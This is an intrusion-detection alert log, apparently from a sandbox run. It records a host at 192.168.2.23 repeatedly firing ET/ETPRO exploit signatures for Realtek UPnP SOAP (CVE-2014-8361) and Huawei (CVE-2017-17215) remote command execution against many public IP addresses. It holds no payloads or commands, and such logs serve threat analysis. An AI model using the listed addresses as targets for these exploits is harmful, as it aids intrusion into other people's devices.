                                      07/20/24-23:01:45.095767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597252869192.168.2.23210.199.180.209
                                      07/20/24-23:01:55.105161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4021252869192.168.2.23129.221.8.145
                                      07/20/24-23:02:34.610209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5355052869192.168.2.23129.68.201.164
                                      07/20/24-23:01:41.156801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615200452869192.168.2.2380.2.7.209
                                      07/20/24-23:01:57.429251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4098252869192.168.2.23206.37.245.255
                                      07/20/24-23:02:04.052371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614087452869192.168.2.2313.96.238.187
                                      07/20/24-23:01:44.706302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615826652869192.168.2.23163.47.80.71
                                      07/20/24-23:01:42.660847TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614008452869192.168.2.2379.42.102.158
                                      07/20/24-23:01:24.943244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223837215192.168.2.23197.88.128.116
                                      07/20/24-23:01:47.163877TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613323852869192.168.2.23175.15.219.89
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034037215192.168.2.2341.218.114.123
                                      07/20/24-23:01:34.053062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530637215192.168.2.2341.171.1.73
                                      07/20/24-23:01:58.301558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4810652869192.168.2.23167.172.23.251
                                      07/20/24-23:02:06.689806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4196852869192.168.2.2335.30.208.203
                                      07/20/24-23:01:46.512162TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24577252869192.168.2.23179.32.230.224
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757837215192.168.2.23197.47.237.221
                                      07/20/24-23:01:42.129029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3493052869192.168.2.23155.71.120.47
                                      07/20/24-23:01:42.699598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24599652869192.168.2.23219.124.32.18
                                      07/20/24-23:01:45.370481TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25304452869192.168.2.2334.173.234.248
                                      07/20/24-23:01:48.133778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675252869192.168.2.23195.45.218.64
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680437215192.168.2.23157.148.30.140
                                      07/20/24-23:01:20.110861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803437215192.168.2.23157.180.152.242
                                      07/20/24-23:01:47.990801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011052869192.168.2.23129.221.8.145
                                      07/20/24-23:01:52.582295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615423252869192.168.2.23129.189.126.127
                                      07/20/24-23:01:06.991143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980637215192.168.2.23197.25.151.108
                                      07/20/24-23:01:00.634165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060837215192.168.2.2341.222.48.132
                                      07/20/24-23:01:34.060991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763237215192.168.2.23157.1.189.223
                                      07/20/24-23:01:42.812448TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4336252869192.168.2.23119.167.95.17
                                      07/20/24-23:01:09.002255TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25945052869192.168.2.235.1.90.206
                                      07/20/24-23:01:44.996260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5599452869192.168.2.23219.230.144.186
                                      07/20/24-23:01:42.522141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613848252869192.168.2.2393.78.34.12
                                      07/20/24-23:01:52.244347TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23419852869192.168.2.2372.2.201.225
                                      07/20/24-23:01:43.697010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4007652869192.168.2.23138.38.220.62
                                      07/20/24-23:01:52.285243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3686652869192.168.2.2396.119.211.11
                                      07/20/24-23:01:24.498942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614254652869192.168.2.2389.183.176.41
                                      07/20/24-23:00:59.161892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279837215192.168.2.23157.71.150.37
                                      07/20/24-23:01:46.176757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614760652869192.168.2.23220.91.249.28
                                      07/20/24-23:01:08.667512TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5896452869192.168.2.23107.75.193.125
                                      07/20/24-23:01:47.918473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3828652869192.168.2.23130.218.184.181
                                      07/20/24-23:01:11.636425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979437215192.168.2.23197.250.145.46
                                      07/20/24-23:00:59.175742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762237215192.168.2.23196.108.213.184
                                      07/20/24-23:01:52.914137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5363652869192.168.2.23155.185.16.155
                                      07/20/24-23:01:34.045143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778837215192.168.2.2341.244.254.171
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.23197.84.25.49
                                      07/20/24-23:01:44.302645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23690652869192.168.2.23181.21.97.146
                                      07/20/24-23:01:54.940318TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24631252869192.168.2.23218.205.210.219
                                      07/20/24-23:01:08.691384TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24738052869192.168.2.23130.190.148.15
                                      07/20/24-23:01:57.747300TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4001252869192.168.2.23134.89.250.200
                                      07/20/24-23:01:43.571815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758452869192.168.2.23157.210.162.125
                                      07/20/24-23:01:54.898102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940452869192.168.2.23104.83.225.175
                                      07/20/24-23:01:47.604425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613738852869192.168.2.2342.29.184.117
                                      07/20/24-23:01:42.800583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614109252869192.168.2.23167.73.249.89
                                      07/20/24-23:01:20.592206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479852869192.168.2.23144.166.152.235
                                      07/20/24-23:01:11.630627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048437215192.168.2.23157.230.27.28
                                      07/20/24-23:01:31.328855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3358452869192.168.2.23100.45.46.163
                                      07/20/24-23:01:12.841280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24342852869192.168.2.232.221.152.25
                                      07/20/24-23:01:25.379759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114852869192.168.2.2338.122.84.31
                                      07/20/24-23:01:34.062277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557437215192.168.2.23157.190.228.200
                                      07/20/24-23:01:43.874054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6009252869192.168.2.23132.191.84.86
                                      07/20/24-23:01:21.909111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862437215192.168.2.2341.106.80.160
                                      07/20/24-23:02:07.984371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613594252869192.168.2.23157.76.157.173
                                      07/20/24-23:01:43.938688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709452869192.168.2.23183.223.8.125
                                      07/20/24-23:01:43.121284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4379452869192.168.2.23161.25.16.6
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049037215192.168.2.2394.167.167.154
                                      07/20/24-23:01:08.630327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5521252869192.168.2.2386.74.227.91
                                      07/20/24-23:01:58.083668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3942652869192.168.2.23210.6.211.62
                                      07/20/24-23:01:34.046616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034037215192.168.2.23157.123.163.220
                                      07/20/24-23:01:08.632574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4152052869192.168.2.234.114.3.131
                                      07/20/24-23:01:20.597058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054052869192.168.2.23207.246.209.117
                                      07/20/24-23:01:47.474975TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24870052869192.168.2.2388.171.168.15
                                      07/20/24-23:02:11.700204TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23857452869192.168.2.2347.13.214.247
                                      07/20/24-23:01:12.806839TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23588852869192.168.2.2360.92.43.190
                                      07/20/24-23:01:44.611556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614315252869192.168.2.23128.114.73.170
                                      07/20/24-23:02:43.591633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3316852869192.168.2.23205.251.62.147
                                      07/20/24-23:01:20.597058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4457852869192.168.2.2336.168.150.31
                                      07/20/24-23:01:50.848726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615542452869192.168.2.23100.28.35.63
                                      07/20/24-23:01:53.064325TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25451252869192.168.2.23158.140.216.184
                                      07/20/24-23:01:45.547484TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615340252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:58.208327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25051252869192.168.2.23125.12.65.53
                                      07/20/24-23:01:44.926055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3681652869192.168.2.23140.59.54.38
                                      07/20/24-23:01:54.569234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25459652869192.168.2.23206.56.63.93
                                      07/20/24-23:01:20.599458TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23760452869192.168.2.23105.36.101.44
                                      07/20/24-23:01:27.653309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172437215192.168.2.231.38.182.72
                                      07/20/24-23:02:40.696155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4044252869192.168.2.235.105.178.105
                                      07/20/24-23:01:42.662837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4273052869192.168.2.2351.186.28.39
                                      07/20/24-23:01:50.794251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25009452869192.168.2.2387.83.8.136
                                      07/20/24-23:01:42.706162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4904052869192.168.2.23105.187.39.89
                                      07/20/24-23:01:58.364551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507052869192.168.2.2363.226.8.25
                                      07/20/24-23:01:44.469580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615895652869192.168.2.2357.145.129.242
                                      07/20/24-23:01:08.903232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497652869192.168.2.23164.189.55.135
                                      07/20/24-23:01:42.509004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614288052869192.168.2.2385.101.71.143
                                      07/20/24-23:01:42.010169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4294652869192.168.2.23190.248.52.121
                                      07/20/24-23:01:43.994703TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614000652869192.168.2.2342.169.174.111
                                      07/20/24-23:01:04.751333TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4932052869192.168.2.23154.97.74.140
                                      07/20/24-23:01:42.033190TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24547252869192.168.2.2350.3.243.177
                                      07/20/24-23:01:04.977217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5980052869192.168.2.23164.251.43.137
                                      07/20/24-23:01:02.113054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567237215192.168.2.23157.106.83.239
                                      07/20/24-23:01:08.684499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4580452869192.168.2.23186.40.176.32
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338837215192.168.2.23197.10.70.203
                                      07/20/24-23:01:52.742499TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615805652869192.168.2.23217.180.101.231
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216037215192.168.2.23197.19.178.39
                                      07/20/24-23:01:02.380657TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614781852869192.168.2.23120.187.5.172
                                      07/20/24-23:01:24.715800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586852869192.168.2.23188.173.105.15
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692437215192.168.2.23197.123.40.207
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3502037215192.168.2.23197.1.124.246
                                      07/20/24-23:01:57.787786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3840652869192.168.2.2360.14.147.228
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528437215192.168.2.2341.73.64.241
                                      07/20/24-23:01:31.978141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561437215192.168.2.2341.217.46.13
                                      07/20/24-23:01:34.075219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172237215192.168.2.23197.145.148.31
                                      07/20/24-23:01:42.142802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5858252869192.168.2.231.132.71.9
                                      07/20/24-23:01:44.660927TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24622852869192.168.2.23165.194.139.225
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.23177.172.21.105
                                      07/20/24-23:01:44.779503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24516852869192.168.2.23147.163.143.195
                                      07/20/24-23:01:55.154049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25812252869192.168.2.2369.193.122.132
                                      07/20/24-23:01:59.030101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25042052869192.168.2.23118.229.228.64
                                      07/20/24-23:01:21.936545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619437215192.168.2.23216.138.36.57
                                      07/20/24-23:01:49.034246TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614321052869192.168.2.23112.175.144.226
                                      07/20/24-23:01:44.922746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613625852869192.168.2.23187.34.215.18
                                      07/20/24-23:01:01.432181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4215052869192.168.2.23161.98.32.121
                                      07/20/24-23:01:08.571946TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24364652869192.168.2.239.190.28.75
                                      07/20/24-23:01:31.991548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721837215192.168.2.23197.42.75.0
                                      07/20/24-23:01:41.930505TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23921252869192.168.2.23160.67.56.20
                                      07/20/24-23:01:58.999794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23976452869192.168.2.23154.194.235.253
                                      07/20/24-23:01:04.082384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740037215192.168.2.2341.185.218.214
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563037215192.168.2.23116.187.119.26
                                      07/20/24-23:01:41.205247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614310652869192.168.2.23104.24.229.93
                                      07/20/24-23:01:08.594120TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26010452869192.168.2.2313.112.9.246
                                      07/20/24-23:01:01.875100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070452869192.168.2.2387.1.160.57
                                      07/20/24-23:01:42.677933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24858052869192.168.2.232.228.92.40
                                      07/20/24-23:00:57.221220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779437215192.168.2.2341.166.85.150
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492237215192.168.2.23202.106.145.234
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618637215192.168.2.23157.159.217.82
                                      07/20/24-23:02:10.113046TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614723252869192.168.2.2349.65.211.106
                                      07/20/24-23:01:43.903732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25947652869192.168.2.2350.123.92.219
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855837215192.168.2.23158.105.50.58
                                      07/20/24-23:01:42.953491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3574052869192.168.2.2357.248.72.169
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739837215192.168.2.2377.13.19.125
                                      07/20/24-23:01:48.036012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661252869192.168.2.2345.226.155.34
                                      07/20/24-23:01:34.077334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857237215192.168.2.23197.233.42.243
                                      07/20/24-23:01:43.044693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615313452869192.168.2.23159.4.8.31
                                      07/20/24-23:01:43.260197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3782652869192.168.2.23207.203.170.191
                                      07/20/24-23:01:43.239928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632252869192.168.2.2357.189.118.114
                                      07/20/24-23:01:46.293475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4597852869192.168.2.23223.217.31.58
                                      07/20/24-23:01:20.592206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3485852869192.168.2.2385.161.3.79
                                      07/20/24-23:01:02.102095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982252869192.168.2.23193.135.58.157
                                      07/20/24-23:01:11.631134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387237215192.168.2.2341.120.225.224
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532037215192.168.2.23197.227.84.26
                                      07/20/24-23:01:47.193367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23441452869192.168.2.2364.212.158.191
                                      07/20/24-23:01:26.000956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613988452869192.168.2.23201.230.67.6
                                      07/20/24-23:01:43.697010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4526252869192.168.2.23111.193.202.8
                                      07/20/24-23:01:10.856294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4298652869192.168.2.232.221.152.25
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065237215192.168.2.23157.46.74.240
                                      07/20/24-23:01:42.276860TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498652869192.168.2.2370.124.249.51
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960637215192.168.2.2341.69.22.214
                                      07/20/24-23:01:42.650744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5652652869192.168.2.23171.216.201.201
                                      07/20/24-23:01:08.559315TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24453852869192.168.2.23161.98.32.121
                                      07/20/24-23:01:42.178390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614224852869192.168.2.2351.186.28.39
                                      07/20/24-23:01:43.203681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614271452869192.168.2.23207.223.163.108
                                      07/20/24-23:02:01.391563TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5248052869192.168.2.2353.205.5.201
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.23157.44.1.200
                                      07/20/24-23:01:20.110861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418037215192.168.2.23157.8.216.67
                                      07/20/24-23:01:47.805449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058652869192.168.2.2388.49.181.78
                                      07/20/24-23:01:08.582150TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25024852869192.168.2.23120.187.5.172
                                      07/20/24-23:00:57.221248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800037215192.168.2.2341.143.61.103
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174837215192.168.2.23135.203.61.14
                                      07/20/24-23:01:59.593869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5988452869192.168.2.23163.245.29.116
                                      07/20/24-23:01:25.020591TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895052869192.168.2.23174.51.233.233
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059637215192.168.2.2341.129.34.41
                                      07/20/24-23:01:42.643745TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25357452869192.168.2.23219.68.37.27
                                      07/20/24-23:01:42.912947TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613483852869192.168.2.2317.17.223.92
                                      07/20/24-23:01:48.080190TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613727252869192.168.2.23124.255.77.181
                                      07/20/24-23:01:04.100971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985037215192.168.2.23157.132.15.197
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567837215192.168.2.23157.157.232.183
                                      07/20/24-23:01:31.312311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24275652869192.168.2.23144.247.247.76
                                      07/20/24-23:01:43.957856TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24906252869192.168.2.2312.82.126.36
                                      07/20/24-23:01:56.536207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615073252869192.168.2.23209.219.111.180
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961637215192.168.2.23161.85.99.11
                                      07/20/24-23:01:08.626717TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23364052869192.168.2.2357.179.102.199
